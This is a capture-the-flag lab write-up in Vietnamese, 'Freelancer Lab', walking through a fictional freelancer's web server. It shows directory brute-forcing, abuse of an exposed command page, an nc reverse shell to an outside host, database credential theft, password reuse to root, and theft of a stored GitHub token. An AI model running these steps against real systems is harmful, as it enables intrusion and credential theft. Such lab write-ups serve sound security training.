Freelancer Lab
Freelancer Lab
William, as a freelance developer, showcases his completed projects and tasks in his portfolio. Your company is considering working with William; however, before initiating the collaboration, you want to ensure that the developer is reliable and writes secure code.
What is William’s new project?
- Tôi truy cập vào trang web , ban đầu thấy định dạng câu trả lời và SEO-friendly có vẻ khớp nhung không phải nhé.
- Tôi truy cập vào robots.txt nhưng không có kết quả gì , brute force thư mục thì thấy 1 thư mục /projects
┌─[✗]─[root@hackerbox]─[~]
└──╼ #gobuster dir -u http://williamtaylor.hv -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://williamtaylor.hv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 281]
/.htaccess (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/css (Status: 301) [Size: 318] [--> http://williamtaylor.hv/css/]
/devtools (Status: 301) [Size: 323] [--> http://williamtaylor.hv/devtools/]
/img (Status: 301) [Size: 318] [--> http://williamtaylor.hv/img/]
/index.html (Status: 200) [Size: 13198]
/js (Status: 301) [Size: 317] [--> http://williamtaylor.hv/js/]
/projects (Status: 301) [Size: 323] [--> http://williamtaylor.hv/projects/]
/server-status (Status: 403) [Size: 281]
/vendor (Status: 301) [Size: 321] [--> http://williamtaylor.hv/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- Truy cập vào /projects thì thấy có 1 file là new-project.txt , đọc nó thì biết được đáp án:
Project Name: Eco-Friendly
Client: Green Innovations
Client Email Address: contact@greeninnovations.hv
Project Summary:
This project involves developing a website for Green Innovations Ltd., a company dedicated to eco-friendly technologies and sustainable solutions. The primary goal is to create a user-friendly and mobile-responsive website that reflects the company's mission, products, and services. The project aims to provide a platform for increasing environmental awareness and promoting eco-friendly practices.
Scope of the project includes:
- Designing the user experience (UX) and user interface (UI)
- Developing and optimizing content for the website
- Implementing SEO (Search Engine Optimization) strategies
- Ensuring mobile compatibility and responsive design
- Managing user feedback and testing processes
This project seeks to assist Green Innovations Ltd. in achieving its sustainable and eco-friendly objectives and contribute to the enhancement of environmental consciousness.==> The Answer : Eco-Friendly
What is the full name of the client from whom William has earned the highest income?
- Tiếp tục tìm các thư mục trên mục tiêu thì tôi thầy được mấu chốt nằm ở /devtools , trong đây sẽ có 1 file command-line.php , tôi thử nhập 1 số lệnh như pwd , whoami , ls thì nó thực thi thật :))) . hehe !
- Tôi cho nó mở 1 revshell để dễ tìm đáp án :
nc my-ip my-port -e /bin/bash- Sau khi đã có 1 shell , nhưng nó chưa có nhắc lệnh , tôi nâng cấp cho nó ổn hơn bằng cách:
python3 -c 'import pty; pty.spawn("/bin/bash")'- Tôi tìm đến file config.php và đọc nó , kết quả cho thấy :
www-data@debian:/var/www/williamtaylor.hv$ ls
ls
config.php css devtools img index.html js projects scss vendor
www-data@debian:/var/www/williamtaylor.hv$ cat con*
cat con*
<?php
// Database configuration details
define('DB_HOST', 'localhost'); // Database host address
define('DB_USER', 'william'); // Database username
define('DB_PASSWORD', 'wt-devx-1'); // Database password
define('DB_NAME', 'freelance_jobs'); // Database name
?>- Tôi truy cập vào databases để tìm thông tin khách hàng và trả lời cho câu hỏi này bằng thông tin xác thực vừa tìm được :
www-data@debian:/var/www/williamtaylor.hv$ mysql -h localhost -u william -p'wt-devx-1' freelance_jobs
<h localhost -u william -p'wt-devx-1' freelance_jobs
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 5
Server version: 10.5.21-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [freelance_jobs]>- Tôi tìm các bảng bằng câu lệnh show tables , thấy được 1 bảng tên clients , đọc nó và sẽ biết kết quả ;
MariaDB [freelance_jobs]> show tables;
show tables;
+--------------------------+
| Tables_in_freelance_jobs |
+--------------------------+
| clients |
+--------------------------+
1 row in set (0.000 sec)
MariaDB [freelance_jobs]> select * from clients order by earnings asc;
select * from clients order by earnings asc;
+----+--------------------+----------------------------+----------+
| id | name | email | earnings |
+----+--------------------+----------------------------+----------+
| 13 | Mason Lee | mason.lee@mail.hv | 1800.00 |
| 32 | Zoey Nelson | zoey.nelson@mail.hv | 1800.00 |
| 3 | Noah Miller | noah.miller@mail.hv | 1850.00 |
| 11 | Logan Wilson | logan.wilson@mail.hv | 1900.00 |
| 24 | Madison Wright | madison.wright@mail.hv | 1900.00 |
| 38 | Lila Turner | lila.turner@mail.hv | 1900.00 |
| 29 | Chloe Hill | chloe.hill@mail.hv | 1950.00 |
| 25 | Avery Johnson | avery.johnson@mail.hv | 2000.00 |
| 5 | Ava Jones | ava.jones@mail.hv | 2050.00 |
| 30 | Layla Scott | layla.scott@mail.hv | 2050.00 |
| 16 | Elijah White | elijah.white@mail.hv | 2100.00 |
| 14 | Oliver Perez | oliver.perez@mail.hv | 2150.00 |
| 36 | Nora Diaz | nora.diaz@mail.hv | 2150.00 |
| 4 | Liam Brown | liam.brown@mail.hv | 2200.00 |
| 26 | Ella Martinez | ella.martinez@mail.hv | 2300.00 |
| 37 | Zoe Robinson | zoe.robinson@mail.hv | 2350.00 |
| 27 | Scarlett Hernandez | scarlett.hernandez@mail.hv | 2400.00 |
| 9 | Amelia Rodriguez | amelia.rodriguez@mail.hv | 2450.00 |
| 28 | Grace Lopez | grace.lopez@mail.hv | 2500.00 |
| 10 | Ethan Taylor | ethan.taylor@mail.hv | 2600.00 |
| 21 | Emily Hall | emily.hall@mail.hv | 2600.00 |
| 35 | Luna Carter | luna.carter@mail.hv | 2650.00 |
| 8 | Mia Anderson | mia.anderson@mail.hv | 2750.00 |
| 20 | Abigail Walker | abigail.walker@mail.hv | 2750.00 |
| 34 | Ellie Rivera | ellie.rivera@mail.hv | 2750.00 |
| 7 | Isabella Martinez | isabella.martinez@mail.hv | 2800.00 |
| 18 | Harper Clark | harper.clark@mail.hv | 2850.00 |
| 2 | Olivia Williams | olivia.williams@mail.hv | 2900.00 |
| 33 | Lily Baker | lily.baker@mail.hv | 2900.00 |
| 17 | Charlotte Harris | charlotte.harris@mail.hv | 2950.00 |
| 12 | Lucas Moore | lucas.moore@mail.hv | 3000.00 |
| 6 | Sophia Garcia | sophia.garcia@mail.hv | 3100.00 |
| 23 | Sofia King | sofia.king@mail.hv | 3100.00 |
| 31 | Riley Adams | riley.adams@mail.hv | 3100.00 |
| 1 | Emma Johnson | emma.johnson@mail.hv | 3200.00 |
| 22 | Elizabeth Young | elizabeth.young@mail.hv | 3200.00 |
| 15 | Aiden Thompson | aiden.thompson@mail.hv | 3300.00 |
| 19 | Evelyn Lewis | evelyn.lewis@mail.hv | 7250.00 |
+----+--------------------+----------------------------+----------+
38 rows in set (0.000 sec)
MariaDB [freelance_jobs]>
==> The Answer : Evelyn Lewis
What is the e-mail address William uses on git?
- Tôi tìm tất cả các file có suid , nhưng không có kết quả , tìm trong crontab hay sudo -l cũng không thấy gì
- Tôi chợt nhận ra mình có mật khẩu của william , tôi đọc file /etc/passwd thì thấy có user william , dùng mật khẩu đã lấy được ở câu trước và đăng nhập được :
www-data@debian:/var$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
postgres:x:108:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
william:x:1001:1001:William Taylor,,,:/home/william:/bin/bash
www-data@debian:/var$ su william
su william
Password: wt-devx-1
william@debian:/var$ sudo -l
sudo -l
[sudo] password for william: wt-devx-1
Matching Defaults entries for william on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User william may run the following commands on debian:
(ALL : ALL) ALL
william@debian:/var$ - Kiểm tra sudo -l thì thấy được tin vui là user này có toàn quyền sudo :)))
- Tôi dùng sudo -i để lên quyền root .
- Tìm tới /home/william thì tìm thất kết quả :
root@debian:/home/william# cd /
cd /
root@debian:/# cd home
cd home
root@debian:/home# ls
ls
lost+found william
root@debian:/home# cd will*
cd will*
root@debian:/home/william# ls
ls
root@debian:/home/william# ls -la
ls -la
total 20
drwxr-xr-x 2 william william 4096 Nov 28 10:01 .
drwxr-xr-x 4 root root 4096 Feb 10 2024 ..
-rw------- 1 william william 0 Nov 28 10:01 .bash_history
-rw-r--r-- 1 william william 220 Feb 10 2024 .bash_logout
-rw-r--r-- 1 william william 3577 Feb 10 2024 .bashrc
-rw-r--r-- 1 william william 68 Feb 10 2024 .gitconfig
root@debian:/home/william# cat ./.gitcon*
cat ./.gitcon*
[user]
name = William Taylor
email = william.dev@williamtaylor.hv
root@debian:/home/william#
==> The Answer : william.dev@williamtaylor.hv
What is the GitHub API Key that William used?
root@debian:/# cd root
cd root
root@debian:~# ls -la
ls -la
total 16
drwx------ 2 root root 4096 Feb 10 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 root root 0 Feb 10 2024 .bash_history
-rw-r--r-- 1 root root 622 Feb 10 2024 .bashrc
-rw------- 1 root root 56 Feb 10 2024 .env
root@debian:~# cat ./.env
cat ./.env
GITHUB_API_KEY=ghp_X12bQ34rT56yZ78uV90wA12bC34dE56fG78h
root@debian:~# ==> The Answer : ghp_X12bQ34rT56yZ78uV90wA12bC34dE56fG78h